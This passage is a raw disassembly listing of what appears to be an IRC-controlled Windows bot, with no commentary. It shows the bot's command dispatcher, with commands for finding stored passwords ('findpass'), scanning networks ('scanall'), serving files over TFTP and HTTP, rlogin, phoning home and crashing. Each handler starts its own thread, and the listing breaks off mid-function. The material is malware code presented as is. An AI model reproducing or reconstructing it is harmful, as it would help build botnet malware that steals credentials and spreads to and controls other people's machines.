push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
loc_40368A: ; CODE XREF: sub_401C87+7114�j
; sub_401C87+7178�j
add esp, 14h
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_403692: ; CODE XREF: sub_401C87+18FD�j
push edi
push offset aGetclip ; "getclip"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4040E8
push edi
push offset aGc ; "gc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4040E8
push edi
push offset aFlusharp ; "flusharp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4040CB
push edi
push offset aFarp ; "farp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4040CB
push edi
push offset aFlushdns ; "flushdns"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi
push offset aFdns ; "fdns"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi
push offset aCurrentip ; "currentip"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404053
push edi
push offset aCip ; "cip"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404053
push edi
push offset aRloginserver ; "rloginserver"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403EF7
push edi
push offset aRlogin ; "rlogin"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403EF7
push edi
push offset aHttpserver ; "httpserver"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403D82
push edi
push offset aHttp ; "http"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403D82
push edi
push offset aTftpserver ; "tftpserver"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403C51
push edi
push offset aTftp ; "tftp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403C51
push edi
push offset aCrash ; "crash"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40381E
lea eax, [ebp+var_2C0]
push offset dword_440684
push eax
call sub_41EA60
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_4037FD
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_4037FD: ; CODE XREF: sub_401C87+1B58�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
mov [esp+10h+var_10], offset aCrash_0 ; "crash"
push [ebp+esi+var_7C]
call sub_41F7E0
jmp loc_402212
; ---------------------------------------------------------------------------
loc_40381E: ; CODE XREF: sub_401C87+1B40�j
push edi
push offset aScanall ; "scanall"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40394D
push edi
push offset aSa ; "sa"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40394D
push edi
push offset aPhonehome ; "phonehome"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_403872
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+arg_4]
call sub_409C2F
jmp loc_4020E7
; ---------------------------------------------------------------------------
loc_403872: ; CODE XREF: sub_401C87+1BD0�j
push edi
push offset aFindpass ; "findpass"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_403898
push edi
push offset aFp ; "fp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_403610
loc_403898: ; CODE XREF: sub_401C87+1BFA�j
push [ebp+var_88]
lea eax, [ebp+var_F54]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
push offset unk_4406F4
mov [ebp+var_F58], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED0], eax
mov eax, [ebp+var_8]
mov [ebp+var_ECC], eax
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
push ebx
lea eax, [ebp+var_2C0]
push 26h
push eax
call sub_40B691
add esp, 24h
mov [ebp+var_ED4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F58]
push ebx
push eax
push offset sub_41786C
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_ED4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_403940
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44071C
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_403938: ; CODE XREF: sub_401C87+1CBF�j
push 32h
call ds:dword_4F534C ; Sleep
loc_403940: ; CODE XREF: sub_401C87+1C9E�j
cmp [ebp+var_EC8], ebx
jz short loc_403938
jmp loc_402593
; ---------------------------------------------------------------------------
loc_40394D: ; CODE XREF: sub_401C87+1BA6�j
; sub_401C87+1BBB�j
mov al, ds:byte_448352
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_448352
jz loc_4076C4
mov ecx, edx
loc_403964: ; CODE XREF: sub_401C87+1CE5�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_403964
cmp al, bl
jz loc_4076C4
mov [ebp+arg_18], edx
mov esi, offset a2 ; "#2"
loc_40397E: ; CODE XREF: sub_401C87+1FA3�j
push 0Bh
call sub_40B8D3
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 1F4h
jle short loc_4039CD
push ecx
lea eax, [ebp+var_2C0]
push offset unk_440758
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 20h
jmp loc_403C21
; ---------------------------------------------------------------------------
loc_4039CD: ; CODE XREF: sub_401C87+1D11�j
or [ebp+var_730], 0FFFFFFFFh
cmp ds:dword_4481F0, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], 320h
mov [ebp+arg_0], ebx
jz short loc_403A3E
mov edi, offset dword_4481F0
loc_403A02: ; CODE XREF: sub_401C87+1D99�j
mov eax, [ebp+arg_18]
add eax, 0FFFFFFF6h
push eax
lea eax, [edi-28h]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_403A24
inc [ebp+arg_0]
add edi, 40h
cmp [edi], ebx
jnz short loc_403A02
jmp short loc_403A3E
; ---------------------------------------------------------------------------
loc_403A24: ; CODE XREF: sub_401C87+1D8F�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, ds:dword_4481F0[ecx]
mov [ebp+var_74C], ecx
loc_403A3E: ; CODE XREF: sub_401C87+1D74�j
; sub_401C87+1D9B�j
cmp [ebp+var_74C], ebx
jz loc_403C47
push 10h
lea eax, [ebp+var_2CC]
pop edi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2CC], edi
push [ebp+arg_4]
call ds:dword_4E2F6C ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_308], eax
push [ebp+var_308]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_860]
push eax
call sub_41E510
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_860]
push eax
call sub_41F5B0
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_403AE6
loc_403AC4: ; CODE XREF: sub_401C87+1E5D�j
cmp eax, ebx
jz short loc_403AE6
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h
push eax
call sub_41F5B0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_403AC4
loc_403AE6: ; CODE XREF: sub_401C87+1E3B�j
; sub_401C87+1E3F�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov [ebp+var_750], eax
mov eax, [ebp+var_4]
mov [ebp+var_728], eax
mov eax, [ebp+var_8]
mov [ebp+var_724], eax
mov edi, 80h
lea eax, [ebp+var_850]
push edi
push eax
mov [ebp+var_720], 1
call sub_41EC30
push offset byte_4E2E79
push esi
call sub_41F7E0
add esp, 14h
test eax, eax
jz short loc_403B48
push esi
lea eax, [ebp+var_7D0]
push edi
push eax
call sub_41EC30
add esp, 0Ch
jmp short loc_403B4E
; ---------------------------------------------------------------------------
loc_403B48: ; CODE XREF: sub_401C87+1EAC�j
mov [ebp+var_7D0], bl
loc_403B4E: ; CODE XREF: sub_401C87+1EBF�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_403B60
mov eax, offset aSequential ; "Sequential"
loc_403B60: ; CODE XREF: sub_401C87+1ED2�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_4407B0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 0Bh
push eax
call sub_40B691
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40CA91
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_403C3D
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C0]
push offset unk_44081C
push eax
call sub_41EA60
add esp, 0Ch
loc_403BF3: ; CODE XREF: sub_401C87+1FBE�j
cmp [ebp+var_8], ebx
jnz short loc_403C14
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_403C14: ; CODE XREF: sub_401C87+1F6F�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
pop ecx
loc_403C21: ; CODE XREF: sub_401C87+1D41�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_40397E
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_403C35: ; CODE XREF: sub_401C87+1FBC�j
push 32h
call ds:dword_4F534C ; Sleep
loc_403C3D: ; CODE XREF: sub_401C87+1F4F�j
cmp [ebp+var_71C], ebx
jz short loc_403C35
jmp short loc_403BF3
; ---------------------------------------------------------------------------
loc_403C47: ; CODE XREF: sub_401C87+1DBD�j
push offset unk_440858
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_403C51: ; CODE XREF: sub_401C87+1B16�j
; sub_401C87+1B2B�j
push 5
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_403C67
push offset unk_440890
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_403C67: ; CODE XREF: sub_401C87+1FD4�j
mov eax, [ebp+esi+var_8C]
mov edi, 104h
cmp eax, ebx
jz short loc_403C8A
push eax
lea eax, [ebp+var_2D50]
push edi
push eax
call sub_41EC30
add esp, 0Ch
jmp short loc_403C99
; ---------------------------------------------------------------------------
loc_403C8A: ; CODE XREF: sub_401C87+1FEE�j
lea eax, [ebp+var_2D50]
push edi
push eax
push ebx
call ds:off_4F5344
loc_403C99: ; CODE XREF: sub_401C87+2001�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_403CA9
mov esi, offset byte_43F0FC
loc_403CA9: ; CODE XREF: sub_401C87+201B�j
push esi
lea eax, [ebp+var_2C4C]
push edi
push eax
call sub_41EC30
mov eax, ds:dword_43F07C
push 7Fh
push [ebp+var_88]
mov [ebp+var_2B40], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B44], ebx
mov [ebp+var_2D54], eax
lea eax, [ebp+var_2B3C]
push eax
call sub_41E510
mov eax, [ebp+var_4]
mov [ebp+var_2ABC], eax
mov eax, [ebp+var_8]
mov [ebp+var_2AB8], eax
lea eax, [ebp+var_2D50]
push eax
lea eax, [ebp+var_2C0]
push [ebp+var_2B40]
push offset unk_4408B0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 5
push eax
call sub_40B691
add esp, 34h
mov [ebp+var_2B48], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D54]
push ebx
push eax
push offset sub_41206F
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2B48]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_403D75
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4408E4
jmp loc_406190
; ---------------------------------------------------------------------------
loc_403D6D: ; CODE XREF: sub_401C87+20F4�j
push 32h
call ds:dword_4F534C ; Sleep
loc_403D75: ; CODE XREF: sub_401C87+20D3�j
cmp [ebp+var_2AB4], ebx
jz short loc_403D6D
jmp loc_407148
; ---------------------------------------------------------------------------
loc_403D82: ; CODE XREF: sub_401C87+1AEC�j
; sub_401C87+1B01�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403DA1
push edi
call sub_41E710
test eax, eax
pop ecx
jz short loc_403DA1
push edi
call sub_41E710
pop ecx
jmp short loc_403DA6
; ---------------------------------------------------------------------------
loc_403DA1: ; CODE XREF: sub_401C87+2104�j
; sub_401C87+210F�j
mov eax, ds:dword_43F080
loc_403DA6: ; CODE XREF: sub_401C87+2118�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_36C8], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B4], eax
jz short loc_403DD9
lea eax, [ebp+var_37CC]
push esi
push eax
call sub_41EA60
pop ecx
pop ecx
jmp short loc_403E04
; ---------------------------------------------------------------------------
loc_403DD9: ; CODE XREF: sub_401C87+213F�j
lea eax, [ebp+var_4FF4]
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_4C8]
push ebx
push eax
lea eax, [ebp+var_4FF4]
push eax
call sub_41ED30
add esp, 14h
loc_403E04: ; CODE XREF: sub_401C87+2150�j
lea eax, [ebp+var_37CC]
push eax
call sub_41BC70
cmp [ebp+eax+var_37CD], 5Ch
pop ecx
jnz short loc_403E2F
lea eax, [ebp+var_37CC]
push eax
call sub_41BC70
pop ecx
mov [ebp+eax+var_37CD], bl
loc_403E2F: ; CODE XREF: sub_401C87+2192�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A54]
mov [ebp+var_3A58], esi
push 80h
push eax
call sub_41EC30
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36B8], eax
lea eax, [ebp+var_37CC]
mov [ebp+var_36BC], edi
push eax
push [ebp+var_36C8]
push esi
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_440920
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 3
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_36C0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A58]
push ebx
push eax
push offset sub_40FA20
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_36C0]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_403EEA
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44095C
jmp loc_404014
; ---------------------------------------------------------------------------
loc_403EE2: ; CODE XREF: sub_401C87+2269�j
push 32h
call ds:dword_4F534C ; Sleep
loc_403EEA: ; CODE XREF: sub_401C87+2248�j
cmp [ebp+var_36AC], ebx
jz short loc_403EE2
jmp loc_404023
; ---------------------------------------------------------------------------
loc_403EF7: ; CODE XREF: sub_401C87+1AC2�j
; sub_401C87+1AD7�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403F16
push edi
call sub_41E710
test eax, eax
pop ecx
jz short loc_403F16
push edi
call sub_41E710
pop ecx
jmp short loc_403F1B
; ---------------------------------------------------------------------------
loc_403F16: ; CODE XREF: sub_401C87+2279�j
; sub_401C87+2284�j
mov eax, ds:dword_43F084
loc_403F1B: ; CODE XREF: sub_401C87+228D�j
mov [ebp+var_1824], eax
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jnz short loc_403F32
lea eax, [ebp+var_C0]
loc_403F32: ; CODE XREF: sub_401C87+22A3�j
push eax
lea eax, [ebp+var_1964]
push 40h
push eax
call sub_41EC30
mov esi, [ebp+esi+var_84]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403F54
mov esi, offset byte_4E2E7A
loc_403F54: ; CODE XREF: sub_401C87+22C6�j
push esi
lea eax, [ebp+var_1924]
push 100h
push eax
call sub_41EC30
push [ebp+var_88]
lea eax, [ebp+var_19E4]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 18h
mov [ebp+var_1810], eax
lea eax, [ebp+var_1964]
push eax
mov [ebp+var_19E8], esi
push [ebp+var_1824]
mov [ebp+var_1814], edi
push esi
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_440998
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 9
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_1820], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19E8]
push ebx
push eax
push offset sub_411349
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1820]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_404049
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4409D4
loc_404014: ; CODE XREF: sub_401C87+2256�j
; sub_401C87+4D76�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
loc_404023: ; CODE XREF: sub_401C87+226B�j
; sub_401C87+23CA�j ...
cmp [ebp+var_8], ebx
jnz loc_402593
push ebx
push edi
loc_40402E: ; CODE XREF: sub_401C87+6638�j
lea eax, [ebp+var_2C0]
push eax
push [ebp+var_88]
push esi
jmp loc_407165
; ---------------------------------------------------------------------------
loc_404041: ; CODE XREF: sub_401C87+23C8�j
push 32h
call ds:dword_4F534C ; Sleep
loc_404049: ; CODE XREF: sub_401C87+237F�j
cmp [ebp+var_180C], ebx
jz short loc_404041
jmp short loc_404023
; ---------------------------------------------------------------------------
loc_404053: ; CODE XREF: sub_401C87+1A98�j
; sub_401C87+1AAD�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_404066
push esi
call sub_41E710
jmp short loc_40406D
; ---------------------------------------------------------------------------
loc_404066: ; CODE XREF: sub_401C87+23D5�j
push 0Bh
call sub_40B8F2
loc_40406D: ; CODE XREF: sub_401C87+23DD�j
cmp eax, ebx
pop ecx
jz loc_409A67
push eax
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BFD2
jmp loc_404533
; ---------------------------------------------------------------------------
loc_40408D: ; CODE XREF: sub_401C87+1A6E�j
; sub_401C87+1A83�j
mov eax, ds:dword_4E2EE4
cmp eax, ebx
jz short loc_4040B0
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2C0]
jz short loc_4040A9
push offset unk_440A10
jmp short loc_4040BB
; ---------------------------------------------------------------------------
loc_4040A9: ; CODE XREF: sub_401C87+2419�j
push offset unk_440A34
jmp short loc_4040BB
; ---------------------------------------------------------------------------
loc_4040B0: ; CODE XREF: sub_401C87+240D�j
push offset unk_440A60
lea eax, [ebp+var_2C0]
loc_4040BB: ; CODE XREF: sub_401C87+2420�j
; sub_401C87+2427�j ...
push 200h
push eax
call sub_41EC30
jmp loc_406F1B
; ---------------------------------------------------------------------------
loc_4040CB: ; CODE XREF: sub_401C87+1A44�j
; sub_401C87+1A59�j
call sub_40ADC9
test eax, eax
lea eax, [ebp+var_2C0]
jz short loc_4040E1
push offset unk_440A8C
jmp short loc_4040BB
; ---------------------------------------------------------------------------
loc_4040E1: ; CODE XREF: sub_401C87+2451�j
push offset unk_440AB0
jmp short loc_4040BB
; ---------------------------------------------------------------------------
loc_4040E8: ; CODE XREF: sub_401C87+1A1A�j
; sub_401C87+1A2F�j
cmp [ebp+var_8], ebx
jnz short loc_404107
push ebx
push [ebp+var_4]
push offset dword_440ADC
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_404107: ; CODE XREF: sub_401C87+2464�j
push ebx
push [ebp+var_4]
call sub_418CAA
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push offset dword_440AF4
jmp loc_404403
; ---------------------------------------------------------------------------
loc_404129: ; CODE XREF: sub_401C87+18AA�j
; sub_401C87+18BF�j
push 0Ah
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_40413F
push offset unk_440B10
jmp loc_409869
; ---------------------------------------------------------------------------
loc_40413F: ; CODE XREF: sub_401C87+24AC�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_41A8ED
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40415E
push offset unk_440B3C
jmp loc_409869
; ---------------------------------------------------------------------------
loc_40415E: ; CODE XREF: sub_401C87+24CB�j
push offset unk_440B64
jmp loc_409869
; ---------------------------------------------------------------------------
loc_404168: ; CODE XREF: sub_401C87+1880�j
; sub_401C87+1895�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40A9CC
jmp loc_402037
; ---------------------------------------------------------------------------
loc_404181: ; CODE XREF: sub_401C87+1856�j
; sub_401C87+186B�j
push [ebp+esi+var_8C]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_417583
jmp loc_402037
; ---------------------------------------------------------------------------
loc_40419E: ; CODE XREF: sub_401C87+182C�j
; sub_401C87+1841�j
or edi, 0FFFFFFFFh
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_4041C7
push esi
call sub_41E710
pop ecx
mov edi, eax
loc_4041C7: ; CODE XREF: sub_401C87+2535�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_4041E0
cmp edi, 0FFFFFFFFh
jnz loc_409A67
loc_4041E0: ; CODE XREF: sub_401C87+254E�j
push ebx
call sub_41B51B
push eax
lea eax, [ebp+var_2C0]
push offset dword_440B84
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
loc_40421D: ; CODE XREF: sub_401C87+5F69�j
add esp, 28h
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_404225: ; CODE XREF: sub_401C87+1802�j
; sub_401C87+1817�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41638E
lea eax, [ebp+var_2C0]
push offset dword_440B9C
push eax
call sub_41EA60
loc_404247: ; CODE XREF: sub_401C87+6858�j
add esp, 14h
jmp loc_407148
; ---------------------------------------------------------------------------
loc_40424F: ; CODE XREF: sub_401C87+17D8�j
; sub_401C87+17ED�j
push 27h
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_404283
cmp [ebp+var_8], ebx
jnz loc_4076C4
push ebx
push [ebp+var_4]
push offset unk_440BBC
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
loc_40427B: ; CODE XREF: sub_401C87+729F�j
add esp, 14h
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_404283: ; CODE XREF: sub_401C87+25D2�j
push [ebp+var_88]
lea eax, [ebp+var_B2C]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_AA0], eax
mov [ebp+var_AA8], ebx
jz short loc_4042E4
push esi
push offset aFull ; "full"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4042E4
mov [ebp+var_AA8], 1
loc_4042E4: ; CODE XREF: sub_401C87+2640�j
; sub_401C87+2651�j
lea eax, [ebp+var_2C0]
push offset dword_440BE4
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 27h
push eax
call sub_40B691
add esp, 14h
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_41A574
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_404364
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C0]
push offset unk_440C00
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_40758A
; ---------------------------------------------------------------------------
loc_40435C: ; CODE XREF: sub_401C87+26E3�j
push 32h
call ds:dword_4F534C ; Sleep
loc_404364: ; CODE XREF: sub_401C87+26B3�j
cmp [ebp+var_A9C], ebx
jz short loc_40435C
jmp loc_40758A
; ---------------------------------------------------------------------------
loc_404371: ; CODE XREF: sub_401C87+17AE�j
; sub_401C87+17C3�j
cmp [ebp+var_8], ebx
jnz short loc_404390
push ebx
push [ebp+var_4]
push offset dword_440C3C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_404390: ; CODE XREF: sub_401C87+26ED�j
push [ebp+arg_4]
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F20 ; WSACleanup
call sub_418EAE
push ebx
call ds:off_4F5338
loc_4043AB: ; CODE XREF: sub_401C87+1784�j
; sub_401C87+1799�j
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_41B6C1
pop ecx
pop ecx
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push offset dword_440C58
jmp short loc_404403
; ---------------------------------------------------------------------------
loc_4043D6: ; CODE XREF: sub_401C87+175A�j
; sub_401C87+176F�j
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B975
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push offset dword_440C74
loc_404403: ; CODE XREF: sub_401C87+249D�j
; sub_401C87+274D�j
call sub_415A3C
loc_404408: ; CODE XREF: sub_401C87+6FE7�j
add esp, 18h
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_404410: ; CODE XREF: sub_401C87+1730�j
; sub_401C87+1745�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_415B79
jmp loc_402037
; ---------------------------------------------------------------------------
loc_404429: ; CODE XREF: sub_401C87+1706�j
; sub_401C87+171B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1594], bl
jz short loc_404468
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_404468
push esi
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_404468
push eax
push offset dword_440C90
lea eax, [ebp+var_1594]
push 80h
push eax
call sub_41EC30
add esp, 10h
loc_404468: ; CODE XREF: sub_401C87+27AB�j
; sub_401C87+27B6�j ...
push [ebp+var_88]
lea eax, [ebp+var_1614]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
push offset dword_440C94
mov [ebp+var_1618], eax
mov eax, [ebp+var_4]
mov [ebp+var_1510], eax
mov eax, [ebp+var_8]
mov [ebp+var_150C], eax
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 25h
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_1514], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1618]
push ebx
push eax
push offset sub_415BEC
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1514]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40450B
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440CAC
jmp loc_40220D
; ---------------------------------------------------------------------------
loc_404503: ; CODE XREF: sub_401C87+288A�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40450B: ; CODE XREF: sub_401C87+2869�j
cmp [ebp+var_1508], ebx
jz short loc_404503
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_404518: ; CODE XREF: sub_401C87+16DC�j
; sub_401C87+16F1�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4159C4
push offset dword_440CE4
call sub_415A3C
loc_404533: ; CODE XREF: sub_401C87+2401�j
add esp, 10h
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_40453B: ; CODE XREF: sub_401C87+16B2�j
; sub_401C87+16C7�j
push [ebp+var_88]
lea eax, [ebp+var_BC4]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
jz short loc_404595
push offset dword_440CFC
push esi
call sub_41F7E0
